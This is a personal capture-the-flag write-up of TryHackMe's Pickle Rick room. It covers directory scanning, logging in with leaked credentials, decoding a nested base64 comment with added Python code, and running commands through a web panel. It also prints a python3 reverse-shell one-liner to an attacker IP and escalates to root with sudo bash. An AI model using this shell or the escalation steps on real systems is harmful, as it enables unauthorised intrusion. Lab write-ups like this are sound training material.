Try Hack Me | Pickle Rick Day #2
Today's Date is April 19th, 2022.
I'm back at the PickleRick CTF Room in TryHackMe today. After a good day in the office, with a few hints from a friend, I'm back on track with a few potential leads.
As it turns out, the directory scanning tools I was using yesterday have some additional features I was unaware of. One of them is an option for a second loop that also tries any file extensions you may want to look for. In other words, yesterday I was ONLY searching for directories, not for files within those directories (or anywhere else). It turns out that searching for files, not just directories, is pretty important when it comes to reconnaissance.
When using Gobuster there is an additional flag I could have been using: the -x (file extensions) flag. It can be used like so:
gobuster dir -u url.to.website -w path/to/wordlist -x ext,ext2,ext3,ext4 -t (threadcount)
This will check each word in the wordlist, such as 'portal', on its own as well as with each extension you specify. That means a word such as "portal" now gets the following checks: url/portal, url/portal.ext, url/portal.ext2, url/portal.ext3, url/portal.ext4.
This was a missing piece in yesterday's puzzle.
After running this command:
gobuster dir -u PickleRickIP.p.thmlabs.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x jpg,jpeg,php,gif -t 10
we find a few pages:
portal.php and login.php
Here we see a username and a login page. Before we try anything fancy, let's just try the username R1ckRul3s with the password found in robots.txt, Wubbalubbadubdub.
Looks like we got lucky. This gets us in, and we're able to see a myriad of options, most of which seem to be locked behind some sort of admin-level permission (the 'real' Rick). Fortunately we have an input panel... not sure what it does, but let's try stuff!
Back when I did the OWASP top 10 training room on TryHackMe, I learned about some XSS attacks. I am curious to know if anything like that works here...
I tried to create a basic popup alert, but to no avail.
Seems like a no? But I haven't exhausted all options. I tried that, but it is prone to not working; generally it needs to be disguised as an onerror handler on an image load so that basic WAFs don't block it.
Anyway, while inspecting the webpage I found a weird comment that looked like a base64 string. I could tell from the double == padding at the end, and from the characters all seeming to be in the 64-character set that base64 requires (2^6 unique characters). Something strange happened, though: when I tried to punch it into an online base64 decoder, it told me 'malformed input'! It took me a second to figure out what was going on, but I am nothing if not stubborn. I was sure I recognized something fishy, so I was persistent and punched it into a program I built some time ago that would, let's call it, 'naively' follow an algorithm to convert any multiple of 6 bits (the base64 character set) to its 8-bit (256-character ASCII) equivalent... and when it was done, it still looked like base64. WHAT?
So I did it again... and again... and again... again!? Again...
Eventually, baking my way all the way down this list:
Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0==
VmpGU1NtVkdTWGxTYkdScFUwWktjRlZyVmt0VE1WWnhVMjA1VG1KSGVIbFhhMXBoVlZaV1ZVMUVhejA=
VjFSSmVGSXlSbGRpU0ZKcFVrVktTMVZxU205TmJHeHlXa1phVVZWVU1Eaz0
V1RJeFIyRldiSFJpUkVKS1VqSm9NbGxyWkZaUVVUMDk=
WTIxR2FWbHRiREJKUjJoMllrZFZQUT09
Y21GaVltbDBJR2h2YkdVPQ==
cmFiYml0IGhvbGU=
rabbit hole
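To peel a nested comment like this one without hand-feeding every layer to a decoder, here is an added example. It is my own code, not the write-up's 'naive' converter and not part of the TryHackMe room; the names NESTED_COMMENT, normalise_padding, decode_layer and peel_base64 are mine. It takes the page's own chain as constructed sample input, throws away whatever padding is present and re-pads to a multiple of four (which is why the stray extra "=" that made the online decoder report malformed input no longer matters), and stops at the first layer that is not printable, base64-shaped text.

```python
import base64
import binascii
import re

# Constructed sample input: the outermost layer of the chain quoted above,
# copied as it appeared in the page comment (note the extra "=" after "QT0").
NESTED_COMMENT = (
    "Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NH"
    "VkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0=="
)

# Base64 alphabet plus optional trailing padding. Anything outside it (a space,
# a colon, a hyphen) means we have reached plaintext and should stop peeling.
_B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def normalise_padding(s: str) -> str:
    """Drop whatever padding is present and re-pad to a multiple of 4.

    The outermost layer has 4n+3 data characters, so exactly one "=" is
    valid, yet the comment carries two. Strict decoders reject that; fixing
    the padding ourselves makes the layer decode cleanly.
    """
    s = "".join(s.split()).rstrip("=")
    return s + "=" * (-len(s) % 4)


def looks_like_base64(s: str) -> bool:
    return bool(_B64_SHAPE.match(s.strip()))


def decode_layer(s: str):
    """Decode one layer; return the text, or None if it is not base64 text."""
    if not looks_like_base64(s):
        return None
    try:
        raw = base64.b64decode(normalise_padding(s), validate=True)
    except binascii.Error:
        # Length 4n+1 after stripping padding can never be valid base64.
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        # Decoded bytes are binary, so the input was plaintext that merely
        # happened to use the base64 alphabet.
        return None
    return text if text.isprintable() else None


def peel_base64(blob: str, max_depth: int = 32):
    """Return every layer, from the input down to the first non-base64 text.

    max_depth guards against input that keeps decoding into something
    base64-shaped forever.
    """
    layers = [blob.strip()]
    for _ in range(max_depth):
        nxt = decode_layer(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


if __name__ == "__main__":
    for depth, layer in enumerate(peel_base64(NESTED_COMMENT)):
        print(f"{depth}: {layer}")
```

Running it prints eight layers, the last being the plaintext. Two stopping rules matter in practice: the shape check catches plaintext containing characters outside the alphabet, and the ASCII/printable check catches short words like "abcd" that happen to be base64-shaped but decode to binary junk, so the peeler never over-decodes a real flag.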
And that's exactly what it felt like I was doing: going way down a rabbit hole, just hoping to get lucky. Now I'm here and not sure what to do with the information other than to execute it as a command... nothing.
Well, I SUPPOSE something I could try would be to input an actual Ubuntu command, since I know this box is running Ubuntu (I discovered this yesterday).
'ls'... I found a clue! (clue.txt), and (Sup3rS3cretPickl3Ingred.txt), which is perhaps the first ingredient. I'll cat this file to read its contents from the command panel next. Hopefully other commands work just the same...
In fact, after I try this, perhaps I'll try launching a reverse shell just so I can work a little more easily on this box from a netcat listener... anyway.
'cat Sup3rS3cretPickl3Ingred.txt'
Fail! This command was disabled to make it more difficult for future Rick (which I guess is me?!). So sad.
Maybe I can just open it like I did robots.txt earlier. Success! I have discovered the first ingredient.
'https://PickleRickIP.p.thmlabs.com/Sup3rS3cretPickl3Ingred.txt' mr. meeseek hair
I wonder what's in clue.txt... The clue is to look around the file system for the other ingredient!
As it would appear, using the 'pwd' command, I am currently in the /var/www/html directory. Time to look around.
I seem to be unable to traverse directories, so I'll have to search from here. 'ls /home' shows me there are two users, 'rick' and 'ubuntu'. In rick's dir there is a dir called 'second ingredients'.
Alright, so I plugged away as best I could using the command line baked into this website, but honestly it was kind of brutal. I tried using netcat, but this device doesn't seem to have netcat installed. I ended up using a python3 one-liner from revshell.com:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKBOX IP",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
to pop a reverse shell to the netcat listener I had running on my machine with nc -lvnp 1337.
Time to upgrade this to a more stable shell. I can do this easily with a command I have used in the past. Because I already know www-data (the user I am now) can run python3, I can use this:
python3 -c 'import pty; pty.spawn("/bin/bash")'
to get a stable shell.
Now I can either look around and see what I can find, or attempt to escalate privileges. I'd like to do the latter first.
Let's try sudo something just to see if I can...
sudo -l is a great one to try first. It'll show me everything my user can do.
Well, that worked... didn't even ask for a password. I can do it all.
can I have root?
sudo bash
I can. :^)
I wonder what I can find now!
I'm not sure where to start, but what I can do is start from the top of the directory tree and work my way down. I know that second ingredients is in /home/rick/second ingredients, but I don't know what to do with that yet. I couldn't get to it earlier when I couldn't use 'cat' from the web portal, but maybe I can now.
I accidentally stumbled onto the 3rd ingredient: fleeb juice. It was just sitting in the home directory of root.
As it turns out, the second ingredient was as simple as 'cat "/home/rick/second ingredient"': 1 jerry tear. I just couldn't use that command from the web UI.
I think my biggest takeaways from completing this CTF are that I need to start doing the obvious things first. I probably could've saved an hour of pondering time had I just tried 'ls' in that command box in the first place, instead of thinking 'Rick' would've had custom obfuscated commands somehow baked into his web front end.
Further to this, more experience with the tools I am using, as well as with whatever other tools might be out there, will come in handy big time. I got lucky a few times (like with the python3 script just sort of working... why would this server have python3 in the first place?), so some takeaways are definitely to become more comfortable enumerating, or perhaps to have a sort of 'plan of attack' where I have a bunch of standard practices lined up, either in my head or on paper, for 'things to do when x happens'.
Anyway, that's the box!